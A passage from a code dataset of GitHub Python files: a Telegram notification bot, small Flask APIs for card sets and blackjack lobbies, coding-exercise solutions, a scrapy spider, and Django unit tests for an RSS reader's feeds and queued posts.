urlopen(req).read()\nurlopen(req).close()\n\npage_soup = soup(page_html, \"html.parser\")\nselect = page_soup.find(\"select\", {\"id\": \"intake\"})\n\nmessage = url\n\nfor option in select.find_all('option'):\n print(option[\"value\"])\n message += str(option[\"value\"]) + \"\\n\\n\"\n print(message)\n\nurl = f\"https://api.telegram.org/bot{TOKEN}/sendMessage?chat_id={chat_id}&text={message}\"\nprint(requests.get(url).json()) # this sends the message","repo_name":"wttg72/RESCheckerBot","sub_path":"rescheck.py","file_name":"rescheck.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30138911959","text":"\"\"\"\n Simple API endpoint for returning sets\n\"\"\"\nfrom flask import (Blueprint, render_template, current_app, request,\n flash, url_for, redirect, session, abort, jsonify, make_response)\nfrom mtgsdk import Set\n\nsets = Blueprint('sets', __name__, url_prefix='/api/v1/sets')\n\n@sets.route('/', methods=['GET'])\ndef get_sets():\n sets = Set.all()\n set_list = list(map(lambda set: {'name': set.name, 'code': set.code, 'release_date': set.release_date}, sets))\n result_json = sorted(set_list, key=lambda set: set['release_date'], reverse=True)\n return jsonify({'sets': result_json}), 201\n","repo_name":"thomascmurphy/draft_academy_api","sub_path":"app/api/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7854037364","text":"import csv\nimport collections\n\n'''\nScript is used to check for duplicates in companylist_full.csv\n'''\n\nwith open ('companylist_full.csv', newline='') as csvfile:\n\tsymbol_list = []\n\tspamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n\tfor row in spamreader:\n\t\tsymbol = row[0]\n\t\tsymbol_list.append(symbol)\n\tprint ([item for item, count in collections.Counter(symbol_list).items() if count > 1])","repo_name":"Jordan396/JEN-stocktracker-bot","sub_path":"Datasets/duplicate_check.py","file_name":"duplicate_check.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"12941268517","text":"from django import forms\r\n\r\nclass ContactForm(forms.Form):\r\n\r\n message = forms.CharField(\r\n #max_length=2000,\r\n widget=forms.Textarea()\r\n )\r\n \r\n\r\n def clean(self):\r\n cleaned_data = super(ContactForm, self).clean()\r\n message = cleaned_data.get('message')","repo_name":"rujeetjahagirdar/FNDWebAPP","sub_path":"proj/hello/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19098237322","text":"class Solution:\n def leftRigthDifference(self, nums: List[int]) -> List[int]:\n total=sum(nums)\n fixed_total=sum(nums)\n for i,v in enumerate(nums):\n left_sum=fixed_total-total\n right_sum=total-v\n total-=v\n nums[i]=abs(left_sum-right_sum)\n return nums\n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"2574-left-and-right-sum-differences/2574-left-and-right-sum-differences.py","file_name":"2574-left-and-right-sum-differences.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44701996260","text":"import scrapy\nimport pandas as pd\nimport os\nimport shutil\nimport sys\nsys.path.append('./')\nfrom scraping_text.items import ScrapingTextItem\n\nos.remove(r\"C:\\Users\\kannu\\OneDrive\\Desktop\\DataScience\\Projects\\Blackcoffer\\20211030 Test Assignment\\vscode\\scraping_text\\scraping_text\\Extracted_data.csv\")\ndf=pd.read_excel(r\"C:\\Users\\kannu\\OneDrive\\Desktop\\DataScience\\Projects\\Blackcoffer\\20211030 Test Assignment\\input.xlsx\")\n\n\nclass scraper(scrapy.Spider):\n name='quotes'\n for url in df['URL'].values:\n start_urls=df['URL'].to_list()\n\n def parse(self,response):\n items=ScrapingTextItem()\n title=\" \".join(response.css('.entry-title::text').extract())\n text=\" \".join(response.css('p::text').extract())\n items['title']=title\n items['text']=text\n\n url_no=df[df['URL']==response._get_url()][\"URL_ID\"].values[0]\n items['url_id']=url_no\n \n yield items","repo_name":"yogendrajoshiML/Data-Extraction-from-different-URLs-and-NLP","sub_path":"vscode/scraping_text/scraping_text/spiders/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25457133698","text":"def selection_sort(arr):\n # Loop through entire arr\n for i in range(len(arr)):\n curr_min_idx = i # The first element is assumed to be the least at first\n \n # Loop through the other numbers in the arr\n for j in range(i+1, len(arr)):\n # If a different number in the array is smaller, store its index\n if arr[j] < arr[curr_min_idx]:\n curr_min_idx = j\n \n # If a new minimum is found, swap it into the corresponding position\n if curr_min_idx != i:\n arr[i], arr[curr_min_idx] = arr[curr_min_idx], arr[i]\n\n return arr","repo_name":"jnguyen1563/interview-practice","sub_path":"Algorithms/Sorting/algorithms/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44555122255","text":"def solve(linenr, cur_accval, accvals, lines, can_change_ins):\n if linenr == len(lines):\n print(\"Program terminated with accval\")\n print(cur_accval)\n return True\n if linenr in accvals:\n return False\n accvals[linenr] = cur_accval\n\n line = lines[linenr]\n\n op = line[:3]\n if op == \"acc\":\n return solve(linenr+1, cur_accval+int(line[4:]), accvals, lines, can_change_ins)\n\n else: # Op == \"acc\"\n inti = int(line[4:])\n if not can_change_ins:\n if op == \"nop\":\n return solve(linenr+1, cur_accval, accvals, lines, can_change_ins)\n return solve(linenr+inti, cur_accval, accvals, lines, can_change_ins)\n else:\n if op == \"nop\":\n if solve(linenr+1, cur_accval, accvals, lines, True):\n return True\n else:\n if solve(linenr+inti, cur_accval, accvals, lines, False):\n return False\n if op == \"jmp\":\n if solve(linenr+inti, cur_accval, accvals, lines, True):\n return True\n else:\n return solve(linenr+1, cur_accval, accvals, lines, False)\n\n\ndef main():\n f=open(\"input\", \"r\")\n lines=[line.strip() for line in f.readlines()]\n\n accvals=dict()\n linenr=0\n acc=0\n solve(0, 0, accvals, lines, True)\n f.close()\n\ndef main_2():\n f=open(\"input\", \"r\")\n lines=[line.strip() for line in f.readlines()]\n\n accvals=dict()\n linenr=0\n acc=0\n while True:\n if linenr in accvals:\n print(\"duplicate\")\n print(linenr)\n print(\"accval was\")\n print(acc)\n return\n accvals[linenr] = acc\n\n line = lines[linenr]\n op = line[:3]\n if op == \"jmp\":\n inti = int(line[4:])\n linenr += inti\n continue\n if op == \"acc\":\n inti = int(line[4:])\n acc += inti\n linenr+=1\n\nmain_2()\nmain()","repo_name":"simonvbrae/advent-of-code-2020","sub_path":"day8/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13496600146","text":"# Default unittest test cases\nfrom django.test import TestCase\n\n# Model classes\nfrom main.models import *\n#UserSettings, Feed, QueueFeed, Post, RSS, Atom, Topic\n\n# Built in users\nfrom django.contrib.auth.models import User, UserManager\n\n## Transaction Management\nfrom django.db import transaction\n\n# Exception\nfrom main.models import FeedURLInvalid, FeedExistsInTopic\nfrom django.db import IntegrityError\nfrom django.core.exceptions import ValidationError\n\n# Python built-ins required for tests\nimport time\nimport datetime\nimport timedelta\nimport pytz\nimport traceback\nimport feedparser\nfrom django.utils import timezone\n\n#UserSettings tests\n# class UserSettingsTestCase(TestCase):\n# def setUp(self):\n# self.user = User.objects.create_user('Lucia', 'lucialu94@uchicago.edu', 'login')\n# self.user.save()\n#\n# def tearDown(self):\n# self.user.delete()\n#\n# def settings_exist(self):\n# \"\"\"Users are created with settings\"\"\"\n# self.assertEqual(self.user.settings.exists(), True)\n#\n# def test_readtime_default(self):\n# \"\"\"Default readtime is 300\"\"\"\n# self.assertEqual(self.user.settings.readtime, 300)\n#\n# def change_readtime_exists(self):\n# \"\"\"Changing the readtime should work\"\"\"\n# self.user.settings.readTime = 400\n# self.assertEqual(self.user.settings.readtime, 400)\n\n#Topic tests\n# class TopicTestCase(TestCase):\n# @classmethod\n# def setUpClass(cls):\n# # User\n# cls.u1 = User.objects.create_user('Devon', 'BAMF@uchicago.edu', 'login')\n# cls.u1.save()\n#\n# # Feed 1\n# cls.f1 = Feed.createByURL(\"http://home.uchicago.edu/~jharriman/example-rss.xml\")\n# cls.f1.save()\n#\n# # Feed 2\n# cls.f2 = Feed.createByURL(\"http://xkcd.com/rss.xml\")\n# cls.f2.save()\n#\n# @classmethod\n# def tearDownClass(cls):\n# cls.f1.delete()\n# cls.f2.delete()\n# cls.u1.delete()\n#\n# def setUp(self):\n# # Create topic t1\n# self.u1.topics.create(name=\"t1\")\n# self.t1 = self.u1.topics.get(name=\"t1\")\n# self.t1.save()\n#\n# # Create topic t2\n# self.u1.topics.create(name=\"t2\")\n# self.t2 = self.u1.topics.get(name=\"t2\")\n# self.t2.save()\n#\n# def tearDown(self):\n# self.t1.delete()\n# self.t2.delete()\n#\n# def test_minimal_topic(self):\n# \"\"\"Tests minimal data needed for Topic\"\"\"\n# def wrap():\n# exceptionRaised = False\n# try:\n# t = Topic(name=\"name\")\n# except Exception:\n# exceptionRaised = True\n# return exceptionRaised\n# self.assertEqual(wrap(), False)\n#\n# def test_edit_topic_name(self):\n# \"\"\"editTopicName renames the topic\"\"\"\n# self.t1.editTopicName(\"space\")\n# self.assertEqual(self.t1.name, \"space\")\n#\n# def test_repeat_topic_name(self):\n# \"\"\"editTopicName throws an error if name already exists\"\"\"\n# def repeat_topic():\n# with transaction.atomic():\n# self.t1.editTopicName(\"t2\")\n# self.assertRaises(IntegrityError, repeat_topic)\n#\n# def test_add_feed(self):\n# \"\"\" adds a Feed to a Topic \"\"\"\n# self.t1.feeds.add(self.f1)\n# self.assertEqual(self.t1.feeds.all()[0], self.f1)\n#\n# # adding Feed to topic it's already in should silently fail\n# self.t1.feeds.add(self.f1)\n# self.assertEqual(self.t1.feeds.all()[0], self.f1)\n# self.assertEqual(len(self.t1.feeds.all()), 1)\n#\n# def test_other_topic_has_feed(self):\n# \"\"\" Cannot add Feed to two topics \"\"\"\n# self.t1.feeds.add(self.f1)\n# def other_topic():\n# self.t2.feeds.add(self.f1)\n# self.assertRaises(ValidationError, other_topic)\n#\n# def test_delete_feed(self):\n# \"\"\" deleteFeed deletes a Feed from a Topic \"\"\"\n# self.t1.feeds.add(self.f1)\n# self.t2.feeds.add(self.f2)\n#\n# #feed not in topic, should fail silently\n# self.t2.deleteFeed(self.f1)\n# self.assertEqual(len(self.t2.feeds.all()), 1)\n# self.assertEqual(self.t2.feeds.all()[0], self.f2)\n#\n# #feed is in topic\n# b1 = self.t1.deleteFeed(self.f1)\n# self.assertEqual(self.t1.feeds.all().exists(), False) #QuerySet of feeds is empty\n\n\nclass FeedTestCase(TestCase):\n @classmethod\n def setUpClass(cls):\n cls.rssFeed = Feed.createByURL(\"main/tests/examples/rss20.xml\")\n cls.rssFeed.save()\n cls.atomFeed = Feed.createByURL(\"main/tests/examples/atom10.xml\")\n cls.rssFeed.save()\n cls.badUrl = \"http://example.com\"\n\n @classmethod\n def tearDownClass(cls):\n cls.rssFeed.delete()\n cls.atomFeed.delete()\n\n # def test_create_by_url_atom(self):\n # \"\"\"Constructor Feed.createByURL accurately creates a Feed object\"\"\"\n # feed = self.atomFeed\n #\n # # Check Feed fields\n # self.assertEqual(feed.URL, u\"main/tests/examples/atom10.xml\")\n # self.assertEqual(feed.docURL, u\"\") # Feedparser seems to be failing on this one\n # self.assertEqual(feed.language, u\"\")\n # self.assertEqual(feed.ttl, None)\n # self.assertEqual(feed.title, u\"Sample Feed\")\n # self.assertEqual(feed.subtitle, u\"For documentation <em>only</em>\")\n # self.assertEqual(feed.rights, u\"<p>Copyright 2005, Mark Pilgrim</p>\")\n # self.assertEqual(feed.logo, u\"\")\n # # Dates Equal?\n # # pubTime = \"2002-09-07T00:00:00Z\"\n # # self.assertEqual(feed.pubDate, pubTime)\n # # self.assertEqual(feed.updated, pubTime)\n #\n # # Check each of the Posts\n # posts = feed.posts.all()\n # post = posts[0]\n # self.assertEqual(post.author, u\"Mark Pilgrim (mark@example.org)\")\n # self.assertEqual(post.category, [])\n # self.assertEqual(post.rights, u\"\")\n # self.assertEqual(post.title, u\"First entry title\")\n # self.assertEqual(post.subtitle, \"\")\n # self.assertEqual(post.content, u\"Watch out for nasty tricks\")\n # self.assertEqual(post.generator, u\"\")\n # self.assertEqual(post.guid, u\"tag:feedparser.org,2005-11-09:/docs/examples/atom10.xml:3\")\n # self.assertEqual(post.url, u\"\")\n # self.assertEqual(post.contributor, u\"\")\n # self.assertEqual(post.updated, datetime.datetime(2005, 11, 9, 11, 56, 34, tzinfo=pytz.UTC))\n # self.assertEqual(post.pubDate, datetime.datetime(2005, 11, 9, 0, 23, 47, tzinfo=pytz.UTC))\n\n # def test_create_by_url_rss(self):\n # \"\"\"Constructor Feed.createByURL accurately creates a Feed object\"\"\"\n # feed = self.rssFeed\n #\n # # Check Feed fields\n # self.assertEqual(feed.URL, u\"main/tests/examples/rss20.xml\")\n # self.assertEqual(feed.docURL, u\"http://example.org/\")\n # self.assertEqual(feed.language, u\"en\")\n # self.assertEqual(feed.ttl, 60)\n # self.assertEqual(feed.title, u\"Sample Feed\")\n # self.assertEqual(feed.subtitle, u\"For documentation only\")\n # self.assertEqual(feed.rights, u\"Copyright 2004, Mark Pilgrim\")\n # self.assertEqual(feed.logo, u\"http://example.org/banner.png\")\n # # Dates Equal?\n # pubTime = \"2002-09-07T00:00:00Z\"\n # self.assertEqual(feed.pubDate, pubTime)\n # # self.assertEqual(feed.updated, pubTime)\n #\n # # Check each of the Posts\n # post = feed.posts.all()[0]\n #\n # # Make sure all the fields are equal\n # self.assertEqual(post.author, u\"mark@example.org\")\n # self.assertEqual(post.category, [u\"Miscellaneous\"])\n # self.assertEqual(post.rights, u\"\")\n # self.assertEqual(post.title, u\"First item title\")\n # self.assertEqual(post.subtitle, \"\")\n # self.assertEqual(post.content, u\"Watch out for nasty tricks\")\n # self.assertEqual(post.generator, u\"\")\n # self.assertEqual(post.guid, u\"http://example.org/guid/1\")\n # self.assertEqual(post.url, u\"http://example.org/item/1\")\n # self.assertEqual(post.contributor, u\"\")\n # self.assertEqual(post.updated, datetime.datetime(2002, 9, 5, 0, 0, tzinfo=pytz.UTC))\n # self.assertEqual(post.pubDate, datetime.datetime(2002, 9, 5, 0, 0, tzinfo=pytz.UTC))\n #\n # # # RSS Specific fields\n # # self.assertEqual(post.enclosure, [\"http://example.org/audio/demo.mp3\"])\n # # self.assertEqual(post.comments, \"http://example.org/comments/1\")\n # #\n # # # Make sure it doesn't contain Atom specific fields\n # # def checkAtomNotPresent():\n # # post.summary()\n # # self.assertRaises(KeyError, checkAtomNotPresent)\n\n # def test_url_invalid(self):\n # \"\"\" Test if a bad URL (non-feed) raises an invalid feed exception \"\"\"\n # def badFeedUrlCreation():\n # feed = Feed.createByURL(self.badUrl)\n # self.assertRaises(FeedURLInvalid, badFeedUrlCreation)\n\n # def test_minimal_feed(self):\n # \"\"\" Test that we can create a feed with the minimal amount of data \"\"\"\n # def wrap():\n # exceptionRaised = False\n # try:\n # f = Feed()\n # except Exception:\n # exceptionRaised = True\n # return exceptionRaised\n # self.assertEqual(wrap(), False)\n\n # def test_get_posts(self):\n # \"\"\" Test battery for getPosts \"\"\"\n # feed = self.rssFeed\n # posts = feed.getPosts(0)\n #\n # # 0\n # self.assertEqual(feed.getPosts(0), [])\n #\n # # Greater than total number of cases\n # self.assertEqual(feed.getPosts(3), list(feed.posts.all().order_by('-pubDate')))\n #\n # # Check posts equal\n # self.assertEqual(feed.getPosts(1), feed.posts.all()[0])\n #\n # # Empty feed\n # feed = Feed()\n # self.assertEqual(feed.getPosts(1), [])\n\n\n # def test_get_all(self):\n # \"\"\" Test battery for getAll() \"\"\"\n # feed = self.rssFeed\n #\n # # Test that the default test returns all its posts\n # self.assertEqual(feed.getAll(), list(feed.posts.all()))\n #\n # # Test that it returns an empty list with an empty feed\n # feed = Feed()\n # self.assertEqual(feed.getAll(), [])\n\n def test_get_size(self):\n \"\"\" Test battery for getSize() \"\"\"\n # feed = self.rssFeed\n pass\n\n # # Test the actual feed size return\n # self.assertEqual(feed.getSize(), 1)\n #\n # # Test 0 case\n # feed = Feed()\n # self.assertEqual(feed.getSize(), 0)\n #\n # feed.delete()\n\nclass CreateQueueFeedTestCase(TestCase):\n def setUp(self):\n self.user = User.objects.create_user('Devon', 'BAMF@uchicago.edu', 'bozo8')\n self.topic = Topic.objects.create(name = 'Comics')\n self.topic.save()\n self.f1 = Feed.createByURL(\"http://xkcd.com/rss.xml\")\n self.postNum = 2\n self.interval = '2 days'\n\n def tearDown(self):\n self.f1.delete()\n self.topic.delete()\n\n def test_create_queue(self):\n \"\"\"Creates Queue with correct number of posts, correct posts, correct interval and postNum\"\"\"\n #make feed\n q = QueueFeed.create(self.f1, self.postNum, self.interval, self.topic, self.user)\n\n #test postNum, interval, feed, name\n self.assertEqual(q.postNum, self.postNum)\n self.assertEqual(q.interval, datetime.timedelta(days = 2))\n self.assertEqual(q.feed, self.f1)\n self.assertEqual(q.topic, self.topic)\n self.assertEqual(q.name, \"Queue:\"+self.f1.title)\n\n #test qPosts\n fPosts = self.f1.posts.all().order_by('pubDate')\n self.assertItemsEqual(q.queuedPosts.all(), [fPosts[0], fPosts[1]])\n\n q.delete()\n\n def test_long_postNum(self):\n \"\"\"Should return as many posts as possible if postNum is larger than Feed Postlist length\"\"\"\n #postNum 5 greater than size of Feed postlist\n pNum = len(self.f1.posts.all()) + 5\n\n #make QueueFeed with pNum as postNum\n q = QueueFeed.create(self.f1, pNum, self.interval, self.topic, self.user)\n\n #check accuracy of postNum, interval, feed\n self.assertEqual(q.postNum, pNum)\n self.assertEqual(q.interval, datetime.timedelta(days = 2))\n self.assertEqual(q.feed, self.f1)\n self.assertEqual(q.topic, self.topic)\n self.assertEqual(q.name, \"Queue:\"+self.f1.title)\n\n #check that qPosts contains all posts in Feed\n fPosts = self.f1.posts.all().order_by('pubDate')\n self.assertItemsEqual(q.queuedPosts.all(), fPosts)\n\n q.delete()\n\nclass QueueFeedTestCase(TestCase):\n def setUp(self):\n\n # mock timezone\n # from http://nedbatchelder.com/blog/201209/mocking_datetimetoday.html\n field = User._meta.get_field('timezone')\n mock_now = lambda: datetime.datetime(2014, 12, 1, 21, 32, 54, 706329, tzinfo=pytz.UTC)\n with patch.object(field, 'now', new=mock_now):\n\n # Create User\n self.user = User.objects.create_user('Devon', 'BAMF@uchicago.edu', 'bozo8')\n self.user.save()\n\n # Create Topic\n self.t1 = self.user.topics.create(name = \"Comics\")\n self.t1.save()\n\n # Create Feeds\n self.f1 = Feed.createByURL(\"http://broodhollow.chainsawsuit.com/feed/\")\n self.f1.save()\n self.f1Posts = self.f1.posts.all().order_by('pubDate')\n\n self.f2 = Feed.createByURL(\"http://www.last-halloween.com/posts.rss\")\n self.f2.save()\n self.f2Posts = self.f2.posts.all().order_by('pubDate')\n\n # Create QueueFeeds\n self.q1PostNum = 3\n self.q1Interval = '1 hour'\n self.q1 = QueueFeed.create(self.f1, self.q1PostNum, self.q1Interval, self.t1, self.user)\n\n self.q2PostNum = 2\n self.q2Interval = '2 hours'\n self.q2 = QueueFeed.create(self.f2, self.q2PostNum, self.q2Interval, self.t1, self.user)\n\n # To test, let's set lastUpdated to an hour ago\n self.q1.lastUpdate = timezone.now() - datetime.timedelta(hours=1, minutes=1)\n\n def tearDown(self):\n # Since QueueFeed owns the ForeignKey for User, deleting the User deletes its QueueFeeds\n self.user.delete()\n\n self.f1.delete()\n self.f2.delete()\n self.t1.delete()\n\n def test_update(self):\n \"\"\"update should update the qPosts and lastUpdate accurately\"\"\"\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:3])\n #import pdb; pdb.set_trace()\n self.q1.update()\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:6])\n self.assertEqual(self.q1.lastUpdate, timezone.now())\n\n def test_less_than_interval_update(self):\n \"\"\"update should not change qPosts or lastUpdate if the Interval hasn't passed\"\"\"\n prevUpdate = self.q1.lastUpdate\n self.assertItemsEqual(self.q2.queuedPosts.all(), self.f2Posts[:2])\n self.q1.update()\n self.assertItemsEqual(self.q2.queuedPosts.all(), self.f2Posts[:2])\n self.assertEqual(self.q1.lastUpdate, prevUpdate)\n\nclass StaticQueueFeedTestCase(TestCase):\n\n def setUp(self):\n field = User._meta.get_field('timezone')\n mock_now = lambda: datetime.datetime(2014, 12, 1, 21, 32, 54, 706329, tzinfo=pytz.UTC)\n with patch.object(field, 'now', new=mock_now):\n\n #create User\n self.user = User.objects.create_user('Devon', 'BAMF@uchicago.edu', 'bozo8')\n self.user.save()\n\n #add QueueFeed to User's Topic\n self.t1 = self.user.topics.create(name = \"Horror\")\n self.t1.save()\n\n #create Feed\n self.f1 = Feed.createByURL(\"http://broodhollow.chainsawsuit.com/feed/\")\n self.f1.save()\n self.f1Posts = self.f1.posts.all().order_by('pubDate')\n\n #create QueueFeed\n self.q1PostNum = 3\n self.q1Interval = '1 hour'\n self.q1 = QueueFeed.create(self.f1, self.q1PostNum, self.q1Interval, self.t1, self.user)\n\n #in the interest of testing, set lastUpdated to an hour ago\n self.q1.lastUpdate = timezone.now() - datetime.timedelta(hours = 1)\n\n #A QueueFeed is always created with static = False; only after creation can a user toggle the static attribute\n self.q1.static = True\n\n #init a list of posts that have been read for the User\n self.postRead = PostsRead(user = self.user, feed = self.q1.feed)\n self.postRead.save()\n\n def tearDown(self):\n # since QueueFeed owns the ForeignKey for User, deleting the User deletes its QueueFeeds\n self.user.delete()\n self.f1.delete()\n self.t1.delete()\n self.postRead.delete()\n\n def test_empty_update(self):\n \"\"\"if none of the q1PostNum posts have been read and the time interval has passed, qPosts is not refilled\"\"\"\n prevUpdate = self.q1.lastUpdate\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:self.q1PostNum])\n self.q1.update()\n # print self.q1.queuedPosts.all()\n # print self.f1Posts[:self.q1PostNum]\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:self.q1PostNum])\n #self.assertEqual(self.q1.lastUpdate, prevUpdate)\n\n def test_full_update(self):\n \"\"\" If all available Posts have been read and the time interval has passed, queuedPosts is refilled \"\"\"\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:self.q1PostNum])\n #tell postRead that every Post in qPost has been read\n for post in self.q1.queuedPosts.all():\n self.postRead.posts.add(post)\n # print \"postRead.posts.all()\"\n # print self.postRead.posts.all()\n self.q1.update()\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:(2*self.q1PostNum)])\n #self.assertEqual(self.q1.lastUpdate, timezone.now())\n\n def test_semi_update(self):\n \"\"\" If some of the Posts have been read, queuedPosts is refilled so there are PostNum unread Posts \"\"\"\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:(self.q1PostNum)])\n\n #There are three items in qPosts upon init of QueueFeed; user reads one item in qPosts\n self.postRead.posts.add(self.q1.queuedPosts.all()[1])\n\n self.q1.update()\n #qPosts grows by 1 post instead of 3; the number of unread qPosts is maintained at postNum (3)\n # print self.q1.queuedPosts.all()\n # print self.f1Posts[:self.q1PostNum+1]\n self.assertItemsEqual(self.q1.queuedPosts.all(), self.f1Posts[:self.q1PostNum+1])\n #self.assertEqual(self.q1.lastUpdate, timezone.now())\n\nclass PostTestCase(TestCase):\n def setUp(self):\n self.feed = Feed()\n self.feed.save()\n # Dont' think we need this if we are making the Post a virtual field\n # def test_create_post(self):\n # \"\"\" Test post constructor createByEntry \"\"\"\n # entry_dict = {\n # \"author\" : \"Test\",\n # \"tags\" : [{\"term\" : \"testCat\"}],\n # \"rights\" : \"BARE ARMS\",\n # \"title\" : \"Title\",\n # \"subtitle\" : \"Subtitle\",\n # \"summary\" : \"

    TEST

    \",\n # \"generator\" : \"I don't know what this is\",\n # \"id\" : \"www.example.com/1892\",\n # \"link\" : \"www.example.com/1892\",\n # \"contributor\" : \"Joe Smith\",\n # \"published_parsed\" : time.struct_time((2014, 11, 2, 16, 13, 2, 6, 306, 0)),\n # \"updated_parsed\" : time.struct_time((2014, 11, 2, 16, 13, 2, 6, 306, 0))\n # }\n #\n # # Create post\n # post = Post.createByEntry(entry_dict, \"www.example.com/test\", self.feed)\n #\n # # Make sure all the fields are equal\n # self.assertEqual(post.author, \"Test\")\n # self.assertEqual(post.category, [\"testCat\"])\n # self.assertEqual(post.rights, \"BARE ARMS\")\n # self.assertEqual(post.title, \"Title\")\n # self.assertEqual(post.subtitle, \"Subtitle\")\n # self.assertEqual(post.content, \"

    TEST

    \")\n # self.assertEqual(post.generator, \"I don't know what this is\")\n # self.assertEqual(post.guid, \"www.example.com/1892\")\n # self.assertEqual(post.url, \"www.example.com/1892\")\n # self.assertEqual(post.contributor, \"Joe Smith\")\n # self.assertEqual(post.updated, datetime.datetime(2014, 11, 2, 14, 00, 22, tzinfo=pytz.UTC))\n # self.assertEqual(post.pubDate, datetime.datetime(2014, 11, 2, 14, 00, 22, tzinfo=pytz.UTC))\n\n def test_post_no_feed(self):\n \"\"\" Test that we cannot create a post with the feed field = null\"\"\"\n def badPostConstruction():\n p = Post()\n self.assertRaises(IntegrityError, badPostConstruction())\n\n def test_minimal_post(self):\n \"\"\" Test that we can create a post with the minimal amount of data \"\"\"\n f = Feed()\n def wrap():\n exceptionRaised = False\n try:\n p = Post({\"feed\" : f})\n except Exception:\n exceptionRaised = True\n return exceptionRaised\n self.assertEquals(wrap(), False)\n\nclass RSSTestCase(TestCase):\n @classmethod\n def setUpClass(cls):\n # Create a feed to put the post in, since the post must have a feed.\n cls.feed = Feed()\n cls.feed.save()\n\n # Grab an entry and parse it\n cls.entry = feedparser.parse(\"main/tests/examples/rss20.xml\")[\"entries\"][0]\n\n @classmethod\n def tearDownClass(cls):\n cls.feed.delete()\n\n def test_create_rss(self):\n \"\"\" Test RSS constructor createByEntry \"\"\"\n # Create post\n post = RSS.createByEntry(self.entry, \"http://www.example.org/atom10.xml\", self.feed)\n post.save()\n post = Post.objects.get(id=post.id)\n\n # Make sure all the fields are equal\n self.assertEqual(post.author, u\"mark@example.org\")\n self.assertEqual(post.category, [u\"Miscellaneous\"])\n self.assertEqual(post.rights, u\"\")\n self.assertEqual(post.title, u\"First item title\")\n self.assertEqual(post.subtitle, \"\")\n self.assertEqual(post.content, u\"Watch out for nasty tricks\")\n self.assertEqual(post.generator, u\"\")\n self.assertEqual(post.guid, u\"http://example.org/guid/1\")\n self.assertEqual(post.url, u\"http://example.org/item/1\")\n self.assertEqual(post.contributor, u\"\")\n self.assertEqual(post.updated, datetime.datetime(2002, 9, 5, 0, 0, 0, tzinfo=pytz.UTC))\n self.assertEqual(post.pubDate, datetime.datetime(2002, 9, 5, 0, 0, 0, tzinfo=pytz.UTC))\n\n # # RSS Specific fields\n # self.assertEqual(post.enclosure, [\"http://example.org/audio/demo.mp3\"])\n # self.assertEqual(post.comments, \"http://example.org/comments/1\")\n\n def test_post_no_feed(self):\n \"\"\" Test that we cannot create a post with the feed field = null\"\"\"\n def badPostConstruction():\n p = RSS()\n self.assertRaises(IntegrityError, badPostConstruction())\n\n def test_minimal_post(self):\n \"\"\" Test that we can create a post with the minimal amount of data \"\"\"\n f = Feed()\n def wrap():\n exceptionRaised = False\n try:\n p = RSS({\"feed\" : f})\n except Exception:\n exceptionRaised = True\n return exceptionRaised\n self.assertEquals(wrap(), False)\n","repo_name":"CombustibleLemons/rss-reader","sub_path":"rss_reader/main/tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":23847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34015137399","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nlobbies = {}\n\n@app.route('/create', methods=['POST'])\ndef create_lobby():\n data = request.get_json()\n lobby_id = data['lobby_id']\n lobby_name = data['lobby_name']\n\n if lobby_id in lobbies:\n return jsonify({'error': 'Lobby with this ID already exists'}), 400\n\n lobbies[lobby_id] = {'name': lobby_name, 'users': []}\n return jsonify({'success': 'Lobby created successfully'}), 201\n\n@app.route('/join', methods=['POST'])\ndef join_lobby():\n data = request.get_json()\n lobby_id = data['lobby_id']\n user = data['user']\n\n if lobby_id not in lobbies:\n return jsonify({'error': 'Lobby with this ID does not exist'}), 404\n\n lobby = lobbies[lobby_id]\n lobby['users'].append(user)\n return jsonify({'success': 'User added to lobby successfully'}), 200\n\n@app.route('/leave', methods=['POST'])\ndef leave_lobby():\n data = request.get_json()\n lobby_id = data['lobby_id']\n user = data['user']\n\n if lobby_id not in lobbies:\n return jsonify({'error': 'Lobby with this ID does not exist'}), 404\n\n lobby = lobbies[lobby_id]\n lobby['users'].remove(user)\n return jsonify({'success': 'User removed from lobby successfully'}), 200\n\n@app.route('/list', methods=['GET'])\ndef list_lobbies():\n return jsonify({'lobbies': lobbies}), 200\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"come219/blackjacks","sub_path":"backend_blackjack/flask_lobbyblackjack_v0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41399712238","text":"import turtle\n\n\n# 多边形外角和等于360\n# t:函数Turtle的对象 length:边长 n:外角\ndef polygon(t, length, n):\n angle = 360 / n # 